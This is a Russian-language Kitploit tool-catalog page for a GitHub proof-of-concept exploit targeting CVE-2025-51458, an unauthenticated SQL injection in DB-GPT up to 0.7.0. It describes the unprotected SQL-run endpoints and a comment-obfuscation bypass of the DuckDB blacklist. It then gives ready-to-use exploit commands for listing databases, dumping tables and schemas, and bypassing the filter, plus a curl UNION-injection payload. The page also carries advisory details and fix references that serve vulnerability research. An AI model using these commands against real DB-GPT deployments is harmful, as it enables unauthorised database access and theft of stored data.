Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-51458-exp — CVE-2025-51458 - PoC эксплуатации SQL-инъекции в DB-GPT до аутентификации | Kitploit
Инструменты/GitHubGitHub/q1uf3ng/cve-2025-51458-exp
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеБезопасность Баз Данных
GitHubq1uf3ng/cve-2025-51458-exp

CVE-2025-51458-exp

CVE-2025-51458 - PoC эксплуатации SQL-инъекции в DB-GPT до аутентификации

Репозиторий
114 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-51458-exp

SQL-инъекция до аутентификации в DB-GPT <= 0.7.0

Обзор

Эндпоинты /api/v1/editor/sql/run и /api/v1/editor/chart/run принимают произвольный SQL без аутентификации. Чёрный список sanitize_sql покрывает только DuckDB; подключения MySQL, PostgreSQL и SQLite получают необработанный пользовательский ввод без фильтрации. Сам чёрный список DuckDB можно обойти с помощью обфускации комментариями (SEL/**/ECT).

Это обход CVE-2024-10835 и CVE-2024-10901.

  • CVSS: 6.5 (средний)
  • Тип: CWE-89 (SQL-инъекция)
  • Аутентификация: не требуется (до аутентификации)
  • Затронуты: DB-GPT <= 0.7.0
  • Исправлено: PR #2650

Использование

root@kitploit:~
# List databases
python3 exp.py http://target:5670 --list-dbs

# Execute SQL
python3 exp.py http://target:5670 <db_name> --sql "SELECT VERSION()"

# Dump tables
python3 exp.py http://target:5670 <db_name> --dump-tables

# Dump schema
python3 exp.py http://target:5670 <db_name> --dump-db

# DuckDB bypass
python3 exp.py http://target:5670 <db_name> --duckdb-bypass --sql "SELECT CURRENT_SETTING('access_mode')"

# Interactive mode
python3 exp.py http://target:5670 <db_name>

Быстрый PoC

root@kitploit:~
curl -X POST "http://target:5670/api/v1/editor/sql/run" \
  -H "Content-Type: application/json" \
  -d '{"db_name":"test_db","sql":"SELECT 1 UNION ALL SELECT table_name FROM information_schema.tables--"}'

Ссылки

  • NVD
  • Gecko Security Blog
  • Исправление PR #2650
Скачать инструмент